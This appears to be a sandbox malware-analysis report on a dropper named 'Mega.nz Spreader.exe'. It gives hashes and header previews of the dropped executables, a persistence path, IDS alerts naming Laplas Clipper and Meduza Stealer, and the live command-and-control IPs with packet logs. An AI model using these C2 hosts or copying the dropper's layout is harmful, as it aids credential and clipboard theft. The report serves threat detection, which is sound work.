Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D........+........./.........)..........+....+...(.'.)..(....(.....(.(...Rich.*.........PE..d.....,d.........." ...".R%..27.....,B........................................\.......X...`..........................................@.....lUA......p[.......V.40....W../....[. C....).T...........................@.).@............p%..............................text..."P%......R%................. ..`.rdata.......p%......V%.............@..@.data.........A..L...`A.............@....pdata..40....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......jV.............@..@.reloc.. C....[..D...tV.............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\select.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30480
Entropy (8bit):	6.57935111855582
Encrypted:	false
SSDEEP:	768:ReUeJVHqbbDNImQGN5YiSyvaAPxWE9Uux:ReUeJVKbbDNImQGT7SyFPxBx
MD5:	756C95D4D9B7820B00A3099FAF3F4F51
SHA1:	893954A45C75FB45FE8048A804990CA33F7C072D
SHA-256:	13E4D9A734A453A3613E11B6A518430099AD7E3D874EA407D1F9625B7F60268A
SHA-512:	0F54F0262CF8D71F00BF5666EB15541C6ECC5246CD298EFD3B7DD39CDD29553A8242D204C42CFB28C537C3D61580153200373C34A94769F102B3BAA288F6C398
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r..t6.t'6.t'6.t'?..'4.t'y.u&4.t'y.q&:.t'y.p&>.t'y.w&2.t'.u&4.t'6.u't.t'}.u&3.t'.y&7.t'.t&7.t'.'7.t'.v&7.t'Rich6.t'........PE..d...$.,d.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66002\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1141016
Entropy (8bit):	5.435136508956488
Encrypted:	false
SSDEEP:	12288:i3kYbfjwR6nbKonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1J:iUYbM30IDJcjEwPgPOG6Xyd461J
MD5:	58F7988B50CBA7B793884F580C7083E1
SHA1:	D52C06B19861F074E41D8B521938DEE8B56C1F2E
SHA-256:	E36D14CF49CA2AF44FAE8F278E883341167BC380099DAC803276A11E57C9CFA1
SHA-512:	397FA46B90582F8A8CD7DF23B722204C38544717BF546837C45E138B39112F33A1850BE790E248FCA5B5ECD9ED7C91CD1AF1864F72717D9805C486DB0505FB9C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................................................................y.........Rich..........................PE..d...'.,d.........." ...".@..........P*...............................................%....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\api.exe

Download File

Process:	C:\Users\user\Desktop\Mega.nz Spreader.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	693248
Entropy (8bit):	6.436857574671814
Encrypted:	false
SSDEEP:	12288:naIB/iXRYmN7aE2SgCK8Z5+/iMp+Ns9hNCgZ7kvPukrhaPV:naIB/iXRt7aE2SgCm/BFNCgcr4PV
MD5:	9022192413DDA223B6E8AFD73A22CFAA
SHA1:	DBFC6D6667FCC47DAA13A317C8791A93F5E495B0
SHA-256:	F575EB5246B5C6B9044EA04610528C040C982904A5FB3DC1909CE2F0EC15C9EF
SHA-512:	D5311BA2138F184B44B73E63067E5446A77640BFE9F75C87E81935E120EE3CA1918AD3D36EBCF24EBADFF0D9AFEC10AB1D3276D4B20D9821466BA8183C80B7AB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......mmG.).).).).).)..~..(.)..~/.(.)..r,.s.)..r-.8.)..r.1.)..~.$.)..~,...)..~-.0.).).(...)..~(.>.).=s .,.).=s.(.).=s+.(.).Rich).).................PE..L....8.d...............$..........................@.......................................@.................................$D...................................>......8...............................@............................................text............................... ..`.rdata...S.......T..................@..@.data....*...`.......:..............@....rsrc................R..............@..@.reloc...>.......@...T..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\leaf.exe

Download File

Process:	C:\Users\user\Desktop\Mega.nz Spreader.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	645632
Entropy (8bit):	5.807176492039975
Encrypted:	false
SSDEEP:	6144:DAG1HGwefBgOvKGpDzjjXzfncN3xw/PSEX1cbR1nE4QawEhaxKgQ76qhQ8Oz0Yt:DAGF/+hl/jwN63L6bgOPQVz
MD5:	8C8C3BCF475B5C95673A810B10A2FC52
SHA1:	268CB3A6A4194EFB14C1BDC82CFAB3485C64FA73
SHA-256:	7F02583173F6E150677AF6FE09226FA6B4FC9EFA2523F393A89B31155A1122C0
SHA-512:	F1948CE32F46A34E425D2F59F5C4E6DE56CBC1E29ECFD706C95F4B00EC2831CCC21A44B81CD18D8D03FE6681463276CD4C8D31B19BFF712574B1FF765BB4E846
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K.d..............P................. ........@.. .......................@............@.....................................O............................ ..........T............................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......................(...`............................................0............(....(..........(.....o..........................( ......(!......("......(#......($....N..(....o....(%....&..(&.....s'........s(........s)........s........s+............0...........~....o,....+...0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....+..*.0......

C:\Users\user\AppData\Local\Temp\lib.exe

Download File

Process:	C:\Users\user\Desktop\Mega.nz Spreader.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7608923
Entropy (8bit):	7.9911405088090985
Encrypted:	true
SSDEEP:	196608:3uFYeaJDfyGlW21X5Sp6GemDMPwuWsYPFqk7t2:iYeaJDfDllpfaMP9g72
MD5:	D1540618704ECACA1A503B496ED7B801
SHA1:	047C0E7C3B0D03470177DFE17053FDB34EA378A4
SHA-256:	1C864D2DEC413DF7D389BF89CC5B0F38C879A93C043A22C98570C1EEA12099AA
SHA-512:	8C91198512C946D1D0AA5583B8EAF96F111091E75EA26A853597B2791D44965E8005FC8E19267CE4CB7180B715968832D15AF987DAE7B6AAA1EEF6B459F043B9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................1...........-......................................H......H......Rich............................PE..d....y.d.........."....".....T.................@.............................0........t...`.....................................................<.... ........... ........... ..\...P...................................@...............P............................text............................... ..`.rdata...'.......(..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc........ ......................@..@.reloc..\.... ......................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\leaf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	659151360
Entropy (8bit):	7.999983666087618
Encrypted:	true
SSDEEP:
MD5:	A0E117D70EEB8A8AEAB628C95E78F524
SHA1:	05A9334BE808DCAF101DF6384A9B8FBAE1D4DA32
SHA-256:	7DBBA01DF332F75EC96FFA691CF3F771F94819F36DC7CDB9DB8F5F7865C70D0A
SHA-512:	8FAE02CE65B169966C3BF53DB1ECE51C691401B8EA15CA5DEDEE8155149DCE852843E3DD883A8A3BCCC4ABCC4CAA98C8EA9150058AAA23976929BA0056EF6A88
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K.d..............P................. ........@.. .......................@............@.....................................O............................ ..........T............................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......................(...`............................................0............(....(..........(.....o..........................( ......(!......("......(#......($....N..(....o....(%....&..(&.....s'........s(........s)........s........s+............0...........~....o,....+...0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....+..*.0......

C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.pid

Download File

Process:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:6n:6
MD5:	48C3EC5C3A93A9E294A8A6392CCEDEB4
SHA1:	4286E9C7CC9E2CD29BFCA3B079055A325EC21A33
SHA-256:	9028DCE6614EB1F7A5FDC2F564F671475CAE5CEC22AE87054199BF38034E0595
SHA-512:	270FE580FFB002BDC32CFC807B6F74CE9C217BBE912A89AFF26F42E808E263E4406ED7307126E0820C8E25EC104341AEA735896716D2CA00ACABFD730F620FB0
Malicious:	false
Preview:	2568

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\lib.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.437244045356168
Encrypted:	false
SSDEEP:	3:vqFIBFReNmI4gELvUAuF5QEyn:jMmI4gELH3
MD5:	9932E9C577764DAA67B544E8C6CCA970
SHA1:	E842DC67307E54799B90739EC74CC8C5455BB1E3
SHA-256:	441E42CF0C4EB813DF84707248AD799437D4CCFE975395570F1831B6FF569029
SHA-512:	1D0D5209D9F2F0DE2FA3D4A9B2AB551FDE4F556276AAA4B20979F85DFB53CBE51874B3ECA6A8455D8D235B54BD3943423BC19FA4E53B4CE0E13D16117A22D0D7
Malicious:	false
Preview:	[5808] Failed to execute script 'meganz' due to unhandled exception!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.988017693219756
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	Mega.nz Spreader.exe
File size:	8'953'856 bytes
MD5:	56b45c6edd70b8d85df6399eea6d24d1
SHA1:	15a65e88ec6dc89e35fef0c5e786ac255d6d4a6e
SHA256:	70f06035e9cc9a891f2959b80e3be9bea2ba07b72bce4fac125249c29c0d9d1c
SHA512:	55275a2511cbd72ce38732ae9d677b753bf813949338182fe2ecdaf026e7438e219bf287ee88805100ed8768377f63009c4b1655fd5de14c5db41501c16b96cc
SSDEEP:	196608:P0akhW+OUggVe3hwHqxogDycV3B7+JULH9XO8WIu:P06+FZKxoM33YURc1
TLSH:	0B96121991E44C87607C2062F4A17EFD426CF236BD9B8E188A620889E53DCF6D77771B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@..................................6.....................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014ad
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a9c887a4f18a3fede2cc29ceea138ed3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000008h
nop
mov eax, 00000004h
push eax
mov eax, 00000000h
push eax
lea eax, dword ptr [ebp-04h]
push eax
call 00007FD3A50B57E1h
add esp, 0Ch
mov eax, 0040148Bh
push eax
call 00007FD3A50B5823h
mov eax, 00000001h
push eax
call 00007FD3A50B5820h
add esp, 04h
mov eax, 00030000h
push eax
mov eax, 00010000h
push eax
call 00007FD3A50B5814h
add esp, 08h
mov eax, dword ptr [00C8A944h]
mov ecx, dword ptr [00C8A948h]
mov edx, dword ptr [00C8A94Ch]
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-04h]
push eax
mov eax, dword ptr [00C8B000h]
push eax
push edx
push ecx
mov eax, dword ptr [ebp-08h]
push eax
call 00007FD3A50B57EEh
add esp, 14h
mov eax, dword ptr [00C8A944h]
mov ecx, dword ptr [00C8A948h]
mov edx, dword ptr [00C8A94Ch]
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [edx]
push eax
mov eax, dword ptr [ecx]
push eax
mov eax, dword ptr [ebp-08h]
mov eax, dword ptr [eax]
push eax
call 00007FD3A50B55CCh
add esp, 0Ch
push eax
call 00007FD3A50B57C4h
add esp, 04h
leave
ret
push ebp
mov ebp, esp
sub esp, 00000004h
nop
mov eax, dword ptr [00C8A944h]
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00000000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x88a8d0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88c000	0x630	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x88a920	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x640	0x800	40e72b673992ed1a54f335093a30fd8f	False	0.40234375	data	4.567461402397821	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x888ad3	0x888c00	9a1b2bfc2c495e583a23dd80f63a598a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x88b000	0x4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x88c000	0x630	0x800	d25a3e6d8b5537cfe3c48f5f70f53c9e	False	0.31787109375	data	3.7268319190943355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x88c0a0	0x2e4	data	English	United States	0.37972972972972974
RT_MANIFEST	0x88c388	0x2a6	XML 1.0 document, ASCII text	English	United States	0.4749262536873156

Imports

DLL	Import
msvcrt.dll	malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
shell32.dll	ShellExecuteA
kernel32.dll	SetUnhandledExceptionFilter

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-31T18:30:04.889268+0200	TCP	2039775	ET MALWARE Laplas Clipper - Regex CnC Request	49721	80	192.168.2.5	45.159.189.105
2024-07-31T18:27:57.316101+0200	TCP	2039775	ET MALWARE Laplas Clipper - Regex CnC Request	49722	80	192.168.2.5	45.159.189.105
2024-07-31T18:28:05.682770+0200	TCP	2050807	ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)	49704	15666	192.168.2.5	77.105.147.1
2024-07-31T18:29:20.997850+0200	TCP	2039775	ET MALWARE Laplas Clipper - Regex CnC Request	49719	80	192.168.2.5	45.159.189.105
2024-07-31T18:28:05.687876+0200	TCP	2050807	ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP)	49704	15666	192.168.2.5	77.105.147.1
2024-07-31T18:29:42.420442+0200	TCP	2039775	ET MALWARE Laplas Clipper - Regex CnC Request	49720	80	192.168.2.5	45.159.189.105

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 31, 2024 18:28:01.145054102 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:01.372059107 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:01.372394085 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:01.599441051 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:01.599498987 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:01.599576950 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:01.698863029 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:01.698908091 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:02.197586060 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:02.197694063 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:02.558557987 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:02.558597088 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:02.559555054 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:02.559670925 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:02.563410044 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:02.608506918 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:02.683998108 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:02.684158087 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:02.684319973 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:02.714570045 CEST	49705	443	192.168.2.5	104.26.12.205
Jul 31, 2024 18:28:02.714642048 CEST	443	49705	104.26.12.205	192.168.2.5
Jul 31, 2024 18:28:05.682770014 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.687817097 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.687839031 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.687853098 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.687866926 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.687875986 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.687877893 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.687922001 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.687952995 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.687997103 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.688004017 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.688009024 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.688041925 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.688055038 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.688113928 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.688127041 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.688178062 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.695698023 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.695710897 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.695723057 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.695763111 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.695780993 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.695782900 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.695796013 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.695807934 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.695827007 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.695852041 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.697185993 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.697277069 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.742947102 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.743066072 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.795320988 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.795419931 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.843261003 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.843359947 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.894798994 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.894870043 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.946984053 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.947047949 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:05.995172977 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:05.995249987 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.050709009 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.050760031 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.099056005 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.099126101 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.151000977 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.151082039 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.198751926 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.198817015 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.253525019 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.253590107 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.306622982 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.306704998 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.363132000 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.363199949 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.412836075 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.412913084 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.458847046 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.460139990 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.502880096 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.502962112 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.551083088 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.551203012 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.603106022 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.603197098 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.654923916 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.655040026 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.702806950 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.702900887 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.754729986 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.754795074 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.806844950 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.808413982 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.854763031 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.854876041 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.906793118 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.906867981 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:06.958764076 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:06.958842993 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.006839037 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.008311033 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.054951906 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.055773973 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.103234053 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.108447075 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.163305044 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.163423061 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.210985899 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.211071014 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.258754015 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.258956909 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.306983948 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.307044029 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.358961105 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.359021902 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.406769037 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.406826973 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.455291033 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.455387115 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.520469904 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.520740986 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.566867113 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.566997051 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.618799925 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.618999004 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.670732975 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.670795918 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.722817898 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.722898006 CEST	49704	15666	192.168.2.5	77.105.147.1
